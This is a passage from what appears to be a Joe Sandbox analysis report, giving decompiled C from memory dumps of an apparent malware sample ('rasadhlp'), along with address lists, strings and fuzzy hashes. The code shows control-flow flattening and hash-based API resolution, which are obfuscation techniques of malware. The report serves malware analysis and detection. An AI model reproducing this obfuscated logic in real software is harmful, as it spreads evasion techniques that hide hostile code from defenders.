								if(_t80 == 0) {
									_t80 = E00323E60(_t104, E00323F00(0x9bab0b12), 0x7facde30, _t151);
									 *0x32e494 = _t80;
								}
								_t145 =  *_t80();
								_t82 =  *0x32dd18;
								__eflags = _t82;
								if(_t82 == 0) {
									_t82 = E00323E60(_t104, E00323F00(0x9bab0b12), 0x9ff0609c, _t151);
									 *0x32dd18 = _t82;
								}
								_t83 =  *_t82(_t145, 8, _t147);
								_t133 = _v144;
								_t104 = _t83;
								 *_t133 = _t104;
								__eflags = _t104;
								if(_t104 == 0) {
									break;
								} else {
									_t53 = _t104 + 0x74; // 0x74
									_t61 = _t53;
									_t146 = 0xffd55eb;
									_v152 = _t61;
									_t151 =  &_v116;
									_v132 = _v148[1];
									_t105 = _v148;
									goto L2;
								}
							}
						} else {
							if(__eflags == 0) {
								_t111 =  *0x32e120;
								_v116 = 0x6c;
								__eflags = _t111;
								if(_t111 == 0) {
									_t111 = E00323E60(_t104, E00323F00(0x26f5757c), 0xa7de3148, _t151);
									 *0x32e120 = _t111;
								}
								_t86 =  *0x32e544; // 0x5944a8
								_t36 = _t86 + 8; // 0x2d609c8
								_t37 = _t86 + 0x10; // 0x2d60b20
								_t87 =  *_t111( *_t37,  *_t36, 1, 0x40,  &_v108,  &_v116);
								__eflags = _t87;
								if(_t87 == 0) {
									_t105 = _v160;
									_t146 = 0x12d660c6;
									_t133 = _v156;
									goto L1;
								} else {
									_t117 =  &_v25;
									_t137 = _t104;
									do {
										_t137 = _t137 + 1;
										 *((char*)(_t137 - 1)) =  *_t117;
										_t117 = _t117 - 1;
										__eflags = _t117 -  &_v120;
									} while (_t117 >=  &_v120);
									_t105 = _v160;
									_t146 = 0xf573de9;
									_t133 = _v156;
									while(1) {
										L1:
										_t61 = _v140;
										goto L2;
									}
								}
							} else {
								__eflags = _t146 - 0xffd55eb;
								if(_t146 == 0xffd55eb) {
									_t112 =  *0x32dff0;
									__eflags = _t112;
									if(_t112 == 0) {
										_t112 = E00323E60(_t104, E00323F00(0x26f5757c), 0xc7ccd5be, _t151);
										 *0x32dff0 = _t112;
									}
									_t93 =  *0x32e544; // 0x5944a8
									_t30 = _t93 + 0x1c; // 0x2d60df0
									 *_t112( *_t30, 0, 0,  &_v124);
									_t105 = _v152;
									_t133 = _v148;
									asm("sbb esi, esi");
									_t146 = (_t146 & 0x0640369a) + 0x715b39b;
									while(1) {
										L1:
										_t61 = _v140;
										goto L2;
									}
								} else {
									__eflags = _t146 - 0x12d660c6;
									if(_t146 != 0x12d660c6) {
										goto L8;
									} else {
										_t98 =  *0x32e308;
										__eflags = _t98;
										if(_t98 == 0) {
											_t98 = E00323E60(_t104, E00323F00(0x26f5757c), 0xd8b73a4f, _t151);
											 *0x32e308 = _t98;
										}
										 *_t98(_v124);
										_t105 = _v140;
										_t146 = 0x715b39b;
										_t133 = _v136;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									}
								}
							}
						}
						goto L51;
						L8:
					} while (_t146 != 0x21395ef6);
					return _v128;
					goto L51;
				}
			}




















































                                                                                0x00322230
                                                                                0x00322230
                                                                                0x00322237
                                                                                0x0032223e
                                                                                0x00322244
                                                                                0x00322248
                                                                                0x0032224d
                                                                                0x00322251
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x00322260
                                                                                0x00322260
                                                                                0x00322260
                                                                                0x00322260
                                                                                0x00322266
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0032226c
                                                                                0x00322366
                                                                                0x0032236c
                                                                                0x00322374
                                                                                0x00322376
                                                                                0x0032238e
                                                                                0x00322390
                                                                                0x00322390
                                                                                0x0032239d
                                                                                0x003223a7
                                                                                0x003223a9
                                                                                0x003223ad
                                                                                0x003223af
                                                                                0x003223b7
                                                                                0x003223bd
                                                                                0x003223c2
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x00000000
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x00000000
                                                                                0x00322272
                                                                                0x00322272
                                                                                0x00322278
                                                                                0x00322314
                                                                                0x0032231a
                                                                                0x00000000
                                                                                0x00322320
                                                                                0x00322320
                                                                                0x00322325
                                                                                0x00322328
                                                                                0x0032232a
                                                                                0x0032232c
                                                                                0x0032233f
                                                                                0x00322344
                                                                                0x00322344
                                                                                0x0032234f
                                                                                0x00322351
                                                                                0x00322355
                                                                                0x00322358
                                                                                0x0032235c
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x00000000
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x0032227e
                                                                                0x0032227e
                                                                                0x003222b2
                                                                                0x003222b8
                                                                                0x003222ba
                                                                                0x003222d2
                                                                                0x003222d4
                                                                                0x003222d8
                                                                                0x003222d8
                                                                                0x003222e5
                                                                                0x003222f2
                                                                                0x003222f5
                                                                                0x003222f7
                                                                                0x003222fd
                                                                                0x00322301
                                                                                0x00322309
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x00000000
                                                                                0x00322255
                                                                                0x00322280
                                                                                0x00322286
                                                                                0x003222ab
                                                                                0x00000000
                                                                                0x00322288
                                                                                0x0032228e
                                                                                0x003225be
                                                                                0x003225c2
                                                                                0x003225c4
                                                                                0x003225c8
                                                                                0x003225c8
                                                                                0x003225d9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0032228e
                                                                                0x00322286
                                                                                0x0032227e
                                                                                0x00322278
                                                                                0x00000000
                                                                                0x0032226c
                                                                                0x003223cf
                                                                                0x003223d5
                                                                                0x00322516
                                                                                0x0032251c
                                                                                0x00000000
                                                                                0x00322522
                                                                                0x00322525
                                                                                0x00322526
                                                                                0x00322528
                                                                                0x0032252d
                                                                                0x0032252d
                                                                                0x0032252d
                                                                                0x00322530
                                                                                0x00322533
                                                                                0x00322538
                                                                                0x0032253b
                                                                                0x0032253d
                                                                                0x00322550
                                                                                0x00322555
                                                                                0x00322555
                                                                                0x0032255c
                                                                                0x0032255e
                                                                                0x00322563
                                                                                0x00322565
                                                                                0x00322578
                                                                                0x0032257d
                                                                                0x0032257d
                                                                                0x00322586
                                                                                0x00322588
                                                                                0x0032258c
                                                                                0x0032258e
                                                                                0x00322590
                                                                                0x00322592
                                                                                0x00000000
                                                                                0x00322598
                                                                                0x0032259c
                                                                                0x0032259c
                                                                                0x003225a2
                                                                                0x003225a7
                                                                                0x003225ab
                                                                                0x003225b1
                                                                                0x003225b5
                                                                                0x00000000
                                                                                0x003225b5
                                                                                0x00322592
                                                                                0x003223db
                                                                                0x003223db
                                                                                0x00322489
                                                                                0x0032248f
                                                                                0x00322497
                                                                                0x00322499
                                                                                0x003224b1
                                                                                0x003224b3
                                                                                0x003224b3
                                                                                0x003224c3
                                                                                0x003224cc
                                                                                0x003224cf
                                                                                0x003224d2
                                                                                0x003224d4
                                                                                0x003224d6
                                                                                0x00322504
                                                                                0x00322508
                                                                                0x0032250d
                                                                                0x00000000
                                                                                0x003224d8
                                                                                0x003224d8
                                                                                0x003224df
                                                                                0x003224e1
                                                                                0x003224e3
                                                                                0x003224e6
                                                                                0x003224e9
                                                                                0x003224ee
                                                                                0x003224ee
                                                                                0x003224f2
                                                                                0x003224f6
                                                                                0x003224fb
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x00000000
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x003223e1
                                                                                0x003223e1
                                                                                0x003223e7
                                                                                0x00322431
                                                                                0x00322437
                                                                                0x00322439
                                                                                0x00322451
                                                                                0x00322453
                                                                                0x00322453
                                                                                0x0032245e
                                                                                0x00322467
                                                                                0x0032246a
                                                                                0x0032246c
                                                                                0x00322472
                                                                                0x00322476
                                                                                0x0032247e
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x00000000
                                                                                0x00322255
                                                                                0x003223e9
                                                                                0x003223e9
                                                                                0x003223ef
                                                                                0x00000000
                                                                                0x003223f5
                                                                                0x003223f5
                                                                                0x003223fa
                                                                                0x003223fc
                                                                                0x0032240f
                                                                                0x00322414
                                                                                0x00322414
                                                                                0x0032241d
                                                                                0x0032241f
                                                                                0x00322423
                                                                                0x00322428
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x00000000
                                                                                0x00322255
                                                                                0x00322255
                                                                                0x003223ef
                                                                                0x003223e7
                                                                                0x003223db
                                                                                0x00000000
                                                                                0x00322294
                                                                                0x00322294
                                                                                0x003222aa
                                                                                0x00000000
                                                                                0x003222aa

                                                                                Strings
                                                                                • 5U, xrefs: 00322314
                                                                                • ><!ENTITY tosa "&#x2929;"><!ENTITY swnwar "&#x292A;"><!ENTITY rarrc "&#x2933;"><!ENTITY cudarrr "&#x2935;"><!ENTITY ldca "&#x2936;"><!ENTITY rdca "&#x2937;"><!ENTITY cudarrl "&#x2938;"><!ENTITY larrpl "&#x2939;"><!ENTITY curarrm "&#x293C;">, xrefs: 00322248, 00322280
                                                                                • l, xrefs: 0032248F
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 5U$><!ENTITY tosa "&#x2929;"><!ENTITY swnwar "&#x292A;"><!ENTITY rarrc "&#x2933;"><!ENTITY cudarrr "&#x2935;"><!ENTITY ldca "&#x2936;"><!ENTITY rdca "&#x2937;"><!ENTITY cudarrl "&#x2938;"><!ENTITY larrpl "&#x2939;"><!ENTITY curarrm "&#x293C;">$l
                                                                                • API String ID: 0-4171344925
                                                                                • Opcode ID: d40abf9ee954db05033d8759249400a68845a9838c3f55b76cb032bd33da9382
                                                                                • Instruction ID: d1508ca882586d4a0d6f10c954a9ae10786f7e76d2e164fbf3d4ab940960c5dd
                                                                                • Opcode Fuzzy Hash: d40abf9ee954db05033d8759249400a68845a9838c3f55b76cb032bd33da9382
                                                                                • Instruction Fuzzy Hash: A6910631A04321AFCB2ADF59EC80A2BB7EABBC8700F15482DF8559B351D735DD058B92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00321FC0, Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 61%
                                                                                			E00321FC0(intOrPtr* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __ebp;
				void* _t20;
				intOrPtr _t23;
				signed int _t24;
				intOrPtr* _t29;
				intOrPtr* _t33;
				intOrPtr* _t36;
				signed int _t37;
				intOrPtr* _t41;
				intOrPtr* _t45;
				intOrPtr* _t48;
				intOrPtr _t50;
				intOrPtr _t56;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr* _t78;
				void* _t79;
				void* _t81;
				void* _t82;

				_t20 = 0x2fa233da;
				_t48 = __edx;
				_t78 = __ecx;
				_t75 = 0;
				while(1) {
					L1:
					_t76 =  *((intOrPtr*)(_t79 + 0x14));
					goto L2;
					do {
						while(1) {
							L2:
							_t81 = _t20 - 0x12f3165e;
							if(_t81 > 0) {
								break;
							}
							if(_t81 == 0) {
								_t29 =  *0x32dd24;
								__eflags = _t29;
								if(_t29 == 0) {
									_t29 = E00323E60(_t48, E00323F00(0x26f5757c), 0x56a553d3, _t78);
									 *0x32dd24 = _t29;
								}
								_t50 =  *0x32e544; // 0x5944a8
								_t14 = _t50 + 8; // 0x2d609c8
								__eflags =  *_t29( *((intOrPtr*)(_t79 + 0x24)), _t76, 0x60,  *_t14, 0, 0);
								_t20 = 0x317ab9d;
								_t75 =  !=  ? 1 : _t75;
								continue;
							} else {
								_t82 = _t20 - 0x58a511f;
								if(_t82 > 0) {
									__eflags = _t20 - 0x5f533d5;
									if(_t20 == 0x5f533d5) {
										__eflags = _t75;
										if(_t75 == 0) {
											E00324220(_t48,  *_t48);
										}
										goto L40;
									} else {
										__eflags = _t20 - 0xecfc0ca;
										if(_t20 != 0xecfc0ca) {
											goto L36;
										} else {
											_t33 =  *0x32e1e0;
											_t77 =  *_t48;
											__eflags = _t33;
											if(_t33 == 0) {
												_t33 = E00323E60(_t48, E00323F00(0xc6fbcd74), 0x624eee2, _t78);
												 *0x32e1e0 = _t33;
											}
											 *_t33(_t77,  *((intOrPtr*)(_t79 + 0x20)),  *((intOrPtr*)(_t79 + 0x18)));
											_t79 = _t79 + 0xc;
											_t20 = 0x225c46c1;
											goto L1;
										}
									}
								} else {
									if(_t82 == 0) {
										_t36 =  *0x32dff0;
										__eflags = _t36;
										if(_t36 == 0) {
											_t36 = E00323E60(_t48, E00323F00(0x26f5757c), 0xc7ccd5be, _t78);
											 *0x32dff0 = _t36;
										}
										_t56 =  *0x32e544; // 0x5944a8
										_t11 = _t56 + 0x1c; // 0x2d60df0
										_t37 =  *_t36( *_t11, 0, 0, _t79 + 0x10);
										asm("sbb eax, eax");
										_t20 = ( ~_t37 & 0x08da8cf5) + 0x5f533d5;
										continue;
									} else {
										if(_t20 == 0xc0acb) {
											 *((intOrPtr*)(_t48 + 4)) =  *((intOrPtr*)(_t78 + 4)) + 0xffffff8c;
											_t41 = E003242C0(_t48,  *((intOrPtr*)(_t78 + 4)) + 0xffffff8c);
											 *_t48 = _t41;
											__eflags = _t41;
											if(_t41 == 0) {
												L40:
												return _t75;
											} else {
												_t76 =  *_t78;
												 *((intOrPtr*)(_t79 + 0x14)) = _t76;
												 *((intOrPtr*)(_t79 + 0x1c)) = _t76 + 0x74;
												 *((intOrPtr*)(_t79 + 0x18)) =  *((intOrPtr*)(_t78 + 4)) - 0x74;
												_t20 = 0x58a511f;
												continue;
											}
										} else {
											if(_t20 != 0x317ab9d) {
												goto L36;
											} else {
												_t45 =  *0x32e308;
												if(_t45 == 0) {
													_t45 = E00323E60(_t48, E00323F00(0x26f5757c), 0xd8b73a4f, _t78);
													 *0x32e308 = _t45;
												}
												 *_t45( *((intOrPtr*)(_t79 + 0x10)));
												_t20 = 0x5f533d5;
												continue;
											}
										}
									}
								}
							}
							L41:
						}
						__eflags = _t20 - 0x2fa233da;
						if(__eflags > 0) {
							__eflags = _t20 - 0x349446de;
							if(_t20 != 0x349446de) {
								goto L36;
							} else {
								_t20 = 0xc0acb;
								goto L2;
							}
						} else {
							if(__eflags == 0) {
								_t20 = 0x21b6ea48;
								goto L2;
							} else {
								__eflags = _t20 - 0x21b6ea48;
								if(_t20 == 0x21b6ea48) {
									__eflags =  *((intOrPtr*)(_t78 + 4)) - 0x74;
									if( *((intOrPtr*)(_t78 + 4)) < 0x74) {
										goto L40;
									} else {
										_t20 = 0x349446de;
										goto L2;
									}
								} else {
									__eflags = _t20 - 0x225c46c1;
									if(_t20 != 0x225c46c1) {
										goto L36;
									} else {
										_t73 =  *0x32deb8;
										__eflags = _t73;
										if(_t73 == 0) {
											_t73 = E00323E60(_t48, E00323F00(0x26f5757c), 0x3174712a, _t78);
											 *0x32deb8 = _t73;
										}
										_t23 =  *0x32e544; // 0x5944a8
										_t18 = _t23 + 0x10; // 0x2d60b20
										_t24 =  *_t73( *_t18,  *((intOrPtr*)(_t79 + 0x20)), 1, 0,  *_t48, _t48 + 4);
										asm("sbb eax, eax");
										_t20 = ( ~_t24 & 0x0fdb6ac1) + 0x317ab9d;
										goto L2;
									}
								}
							}
						}
						goto L41;
						L36:
						__eflags = _t20 - 0x22073c7b;
					} while (_t20 != 0x22073c7b);
					return _t75;
					goto L41;
				}
			}

























                                                                                0x00321fc3
                                                                                0x00321fcc
                                                                                0x00321fce
                                                                                0x00321fd0
                                                                                0x00321fd2
                                                                                0x00321fd2
                                                                                0x00321fd2
                                                                                0x00321fd6
                                                                                0x00321fe0
                                                                                0x00321fe0
                                                                                0x00321fe0
                                                                                0x00321fe0
                                                                                0x00321fe5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00321feb
                                                                                0x0032211a
                                                                                0x0032211f
                                                                                0x00322121
                                                                                0x00322134
                                                                                0x00322139
                                                                                0x00322139
                                                                                0x0032213e
                                                                                0x00322148
                                                                                0x00322154
                                                                                0x0032215b
                                                                                0x00322160
                                                                                0x00000000
                                                                                0x00321ff1
                                                                                0x00321ff1
                                                                                0x00321ff6
                                                                                0x003220c6
                                                                                0x003220cb
                                                                                0x00322212
                                                                                0x00322214
                                                                                0x00322218
                                                                                0x00322218
                                                                                0x00000000
                                                                                0x003220d1
                                                                                0x003220d1
                                                                                0x003220d6
                                                                                0x00000000
                                                                                0x003220dc
                                                                                0x003220dc
                                                                                0x003220e1
                                                                                0x003220e3
                                                                                0x003220e5
                                                                                0x003220f8
                                                                                0x003220fd
                                                                                0x003220fd
                                                                                0x0032210b
                                                                                0x0032210d
                                                                                0x00322110
                                                                                0x00000000
                                                                                0x00322110
                                                                                0x003220d6
                                                                                0x00321ffc
                                                                                0x00321ffc
                                                                                0x0032207b
                                                                                0x00322080
                                                                                0x00322082
                                                                                0x00322095
                                                                                0x0032209a
                                                                                0x0032209a
                                                                                0x003220a4
                                                                                0x003220ae
                                                                                0x003220b1
                                                                                0x003220b5
                                                                                0x003220bc
                                                                                0x00000000
                                                                                0x00321ffe
                                                                                0x00322003
                                                                                0x00322047
                                                                                0x0032204a
                                                                                0x0032204f
                                                                                0x00322051
                                                                                0x00322053
                                                                                0x0032221d
                                                                                0x00322226
                                                                                0x00322059
                                                                                0x00322059
                                                                                0x0032205c
                                                                                0x00322063
                                                                                0x0032206d
                                                                                0x00322071
                                                                                0x00000000
                                                                                0x00322071
                                                                                0x00322005
                                                                                0x0032200a
                                                                                0x00000000
                                                                                0x00322010
                                                                                0x00322010
                                                                                0x00322017
                                                                                0x0032202a
                                                                                0x0032202f
                                                                                0x0032202f
                                                                                0x00322038
                                                                                0x0032203a
                                                                                0x00000000
                                                                                0x0032203a
                                                                                0x0032200a
                                                                                0x00322003
                                                                                0x00321ffc
                                                                                0x00321ff6
                                                                                0x00000000
                                                                                0x00321feb
                                                                                0x00322168
                                                                                0x0032216d
                                                                                0x003221ec
                                                                                0x003221f1
                                                                                0x00000000
                                                                                0x003221f3
                                                                                0x003221f3
                                                                                0x00000000
                                                                                0x003221f3
                                                                                0x0032216f
                                                                                0x0032216f
                                                                                0x003221e2
                                                                                0x00000000
                                                                                0x00322171
                                                                                0x00322171
                                                                                0x00322176
                                                                                0x003221d2
                                                                                0x003221d6
                                                                                0x00000000
                                                                                0x003221d8
                                                                                0x003221d8
                                                                                0x00000000
                                                                                0x003221d8
                                                                                0x00322178
                                                                                0x00322178
                                                                                0x0032217d
                                                                                0x00000000
                                                                                0x0032217f
                                                                                0x0032217f
                                                                                0x00322185
                                                                                0x00322187
                                                                                0x0032219f
                                                                                0x003221a1
                                                                                0x003221a1
                                                                                0x003221a7
                                                                                0x003221ba
                                                                                0x003221bd
                                                                                0x003221c1
                                                                                0x003221c8
                                                                                0x00000000
                                                                                0x003221c8
                                                                                0x0032217d
                                                                                0x00322176
                                                                                0x0032216f
                                                                                0x00000000
                                                                                0x003221fd
                                                                                0x003221fd
                                                                                0x003221fd
                                                                                0x00322211
                                                                                0x00000000
                                                                                0x00322211

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                                                • Associated: 00000011.00000002.2429424873.0000000000320000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429438848.000000000032D000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000011.00000002.2429443922.000000000032F000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_320000_rasadhlp.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: *qt1
                                                                                • API String ID: 0-2708811497
                                                                                • Opcode ID: 1d672bcabb3f532d64e2f73bad4cfaee80b20a023ef68f36cb110412f7eaeb3e
                                                                                • Instruction ID: 94a8b03e95ad408385f36edbdaae72a9e7bec08a248afae77ef820d3f5ac9ecd
                                                                                • Opcode Fuzzy Hash: 1d672bcabb3f532d64e2f73bad4cfaee80b20a023ef68f36cb110412f7eaeb3e
                                                                                • Instruction Fuzzy Hash: 85513731740221ABDB27DF68FD81E2B36A6EB90380F25451AFA11CF755DB35DD018B82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00321FD8, Relevance: .0, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 61%
                                                                                			E00321FD8(void* __eax, intOrPtr* __edi) {
				void* _t20;
				intOrPtr _t23;
				signed int _t24;
				intOrPtr* _t29;
				intOrPtr* _t33;
				intOrPtr* _t36;
				signed int _t37;
				intOrPtr* _t41;
				intOrPtr* _t45;
				intOrPtr* _t48;
				intOrPtr _t51;
				intOrPtr _t57;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr* _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t75 = __edi;
				_t20 = __eax;
				goto L2;
				do {
					while(1) {
						L2:
						_t88 = _t20 - 0x12f3165e;
						if(_t88 > 0) {
							break;
						}
						if(_t88 == 0) {
							_t29 =  *0x32dd24;
							__eflags = _t29;
							if(_t29 == 0) {
								_t29 = E00323E60(_t48, E00323F00(0x26f5757c), 0x56a553d3, _t82);
								 *0x32dd24 = _t29;
							}
							_t51 =  *0x32e544; // 0x5944a8
							_t14 = _t51 + 8; // 0x2d609c8
							__eflags =  *_t29( *((intOrPtr*)(_t85 + 0x24)), _t78, 0x60,  *_t14, 0, 0);
							_t20 = 0x317ab9d;
							_t75 =  !=  ? 1 : _t75;
							continue;
						} else {
							_t89 = _t20 - 0x58a511f;
							if(_t89 > 0) {
								__eflags = _t20 - 0x5f533d5;
								if(_t20 == 0x5f533d5) {
									__eflags = _t75;
									if(_t75 == 0) {
										E00324220(_t48,  *_t48);
									}
									goto L40;
								} else {
									__eflags = _t20 - 0xecfc0ca;
									if(_t20 != 0xecfc0ca) {
										goto L36;
									} else {
										_t33 =  *0x32e1e0;
										_t81 =  *_t48;
										__eflags = _t33;
										if(_t33 == 0) {
											_t33 = E00323E60(_t48, E00323F00(0xc6fbcd74), 0x624eee2, _t82);
											 *0x32e1e0 = _t33;
										}
										 *_t33(_t81,  *((intOrPtr*)(_t85 + 0x20)),  *((intOrPtr*)(_t85 + 0x18)));
										_t85 = _t85 + 0xc;
										_t20 = 0x225c46c1;
										_t78 =  *((intOrPtr*)(_t85 + 0x14));
										continue;
									}
								}
							} else {
								if(_t89 == 0) {
									_t36 =  *0x32dff0;
									__eflags = _t36;
									if(_t36 == 0) {
										_t36 = E00323E60(_t48, E00323F00(0x26f5757c), 0xc7ccd5be, _t82);
										 *0x32dff0 = _t36;
									}
									_t57 =  *0x32e544; // 0x5944a8
									_t11 = _t57 + 0x1c; // 0x2d60df0
									_t37 =  *_t36( *_t11, 0, 0, _t85 + 0x10);
									asm("sbb eax, eax");
									_t20 = ( ~_t37 & 0x08da8cf5) + 0x5f533d5;
									continue;
								} else {
									if(_t20 == 0xc0acb) {
										 *((intOrPtr*)(_t48 + 4)) =  *((intOrPtr*)(_t82 + 4)) + 0xffffff8c;
										_t41 = E003242C0(_t48,  *((intOrPtr*)(_t82 + 4)) + 0xffffff8c);
										 *_t48 = _t41;
										__eflags = _t41;
										if(_t41 == 0) {
											L40:
											return _t75;
										} else {
											_t78 =  *_t82;
											 *((intOrPtr*)(_t85 + 0x14)) = _t78;
											 *((intOrPtr*)(_t85 + 0x1c)) = _t78 + 0x74;
											 *((intOrPtr*)(_t85 + 0x18)) =  *((intOrPtr*)(_t82 + 4)) - 0x74;
											_t20 = 0x58a511f;
											continue;
										}
									} else {
										if(_t20 != 0x317ab9d) {
											goto L36;
										} else {
											_t45 =  *0x32e308;
											if(_t45 == 0) {
												_t45 = E00323E60(_t48, E00323F00(0x26f5757c), 0xd8b73a4f, _t82);
												 *0x32e308 = _t45;
											}
											 *_t45( *((intOrPtr*)(_t85 + 0x10)));
											_t20 = 0x5f533d5;
											continue;
										}
									}
								}
							}
						}
						L41:
					}
					__eflags = _t20 - 0x2fa233da;
					if(__eflags > 0) {
						__eflags = _t20 - 0x349446de;
						if(_t20 != 0x349446de) {
							goto L36;
						} else {
							_t20 = 0xc0acb;
							goto L2;
						}
					} else {
						if(__eflags == 0) {
							_t20 = 0x21b6ea48;
							goto L2;
						} else {
							__eflags = _t20 - 0x21b6ea48;
							if(_t20 == 0x21b6ea48) {
								__eflags =  *((intOrPtr*)(_t82 + 4)) - 0x74;
								if( *((intOrPtr*)(_t82 + 4)) < 0x74) {
									goto L40;
								} else {
									_t20 = 0x349446de;
									goto L2;
								}
							} else {
								__eflags = _t20 - 0x225c46c1;
								if(_t20 != 0x225c46c1) {
									goto L36;
								} else {
									_t73 =  *0x32deb8;
									__eflags = _t73;
									if(_t73 == 0) {
										_t73 = E00323E60(_t48, E00323F00(0x26f5757c), 0x3174712a, _t82);
										 *0x32deb8 = _t73;
									}
									_t23 =  *0x32e544; // 0x5944a8
									_t18 = _t23 + 0x10; // 0x2d60b20
									_t24 =  *_t73( *_t18,  *((intOrPtr*)(_t85 + 0x20)), 1, 0,  *_t48, _t48 + 4);
									asm("sbb eax, eax");
									_t20 = ( ~_t24 & 0x0fdb6ac1) + 0x317ab9d;
									goto L2;
								}
							}
						}
					}
					goto L41;
					L36:
					__eflags = _t20 - 0x22073c7b;
				} while (_t20 != 0x22073c7b);
				return _t75;
				goto L41;
			}























                                                                                0x00321fd8
                                                                                0x00321fd8
                                                                                0x00321fd8
                                                                                0x00321fe0
                                                                                0x00321fe0
                                                                                0x00321fe0
                                                                                0x00321fe0
                                                                                0x00321fe5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00321feb
                                                                                0x0032211a
                                                                                0x0032211f
                                                                                0x00322121
                                                                                0x00322134
                                                                                0x00322139
                                                                                0x00322139
                                                                                0x0032213e
                                                                                0x00322148
                                                                                0x00322154
                                                                                0x0032215b
                                                                                0x00322160
                                                                                0x00000000
                                                                                0x00321ff1
                                                                                0x00321ff1
                                                                                0x00321ff6
                                                                                0x003220c6
                                                                                0x003220cb
                                                                                0x00322212
                                                                                0x00322214
                                                                                0x00322218
                                                                                0x00322218
                                                                                0x00000000
                                                                                0x003220d1
                                                                                0x003220d1
                                                                                0x003220d6
                                                                                0x00000000
                                                                                0x003220dc
                                                                                0x003220dc
                                                                                0x003220e1
                                                                                0x003220e3
                                                                                0x003220e5
                                                                                0x003220f8
                                                                                0x003220fd
                                                                                0x003220fd
                                                                                0x0032210b
                                                                                0x0032210d
                                                                                0x00322110
                                                                                0x00321fd2
                                                                                0x00000000
                                                                                0x00321fd2
                                                                                0x003220d6
                                                                                0x00321ffc
                                                                                0x00321ffc
                                                                                0x0032207b
                                                                                0x00322080
                                                                                0x00322082
                                                                                0x00322095
                                                                                0x0032209a
                                                                                0x0032209a
                                                                                0x003220a4
                                                                                0x003220ae
                                                                                0x003220b1
                                                                                0x003220b5
                                                                                0x003220bc
                                                                                0x00000000
                                                                                0x00321ffe
                                                                                0x00322003
                                                                                0x00322047
                                                                                0x0032204a
                                                                                0x0032204f
                                                                                0x00322051
                                                                                0x00322053
                                                                                0x0032221d
                                                                                0x00322226
                                                                                0x00322059
                                                                                0x00322059
                                                                                0x0032205c
                                                                                0x00322063
                                                                                0x0032206d
                                                                                0x00322071
                                                                                0x00000000
                                                                                0x00322071
                                                                                0x00322005
                                                                                0x0032200a
                                                                                0x00000000
                                                                                0x00322010
                                                                                0x00322010
                                                                                0x00322017
                                                                                0x0032202a
                                                                                0x0032202f
                                                                                0x0032202f
                                                                                0x00322038
                                                                                0x0032203a
                                                                                0x00000000
                                                                                0x0032203a
                                                                                0x0032200a
                                                                                0x00322003
                                                                                0x00321ffc
                                                                                0x00321ff6
                                                                                0x00000000
                                                                                0x00321feb
                                                                                0x00322168
                                                                                0x0032216d
                                                                                0x003221ec
                                                                                0x003221f1
                                                                                0x00000000
                                                                                0x003221f3
                                                                                0x003221f3
                                                                                0x00000000
                                                                                0x003221f3
                                                                                0x0032216f
                                                                                0x0032216f
                                                                                0x003221e2
                                                                                0x00000000
                                                                                0x00322171
                                                                                0x00322171
                                                                                0x00322176
                                                                                0x003221d2
                                                                                0x003221d6
                                                                                0x00000000
                                                                                0x003221d8
                                                                                0x003221d8
                                                                                0x00000000
                                                                                0x003221d8
                                                                                0x00322178
                                                                                0x00322178
                                                                                0x0032217d
                                                                                0x00000000
                                                                                0x0032217f
                                                                                0x0032217f
                                                                                0x00322185
                                                                                0x00322187
                                                                                0x0032219f
                                                                                0x003221a1
                                                                                0x003221a1
                                                                                0x003221a7
                                                                                0x003221ba
                                                                                0x003221bd
                                                                                0x003221c1
                                                                                0x003221c8
                                                                                0x00000000
                                                                                0x003221c8
                                                                                0x0032217d
                                                                                0x00322176
                                                                                0x0032216f
                                                                                0x00000000
                                                                                0x003221fd
                                                                                0x003221fd
                                                                                0x003221fd
                                                                                0x00322211
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.2429430888.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
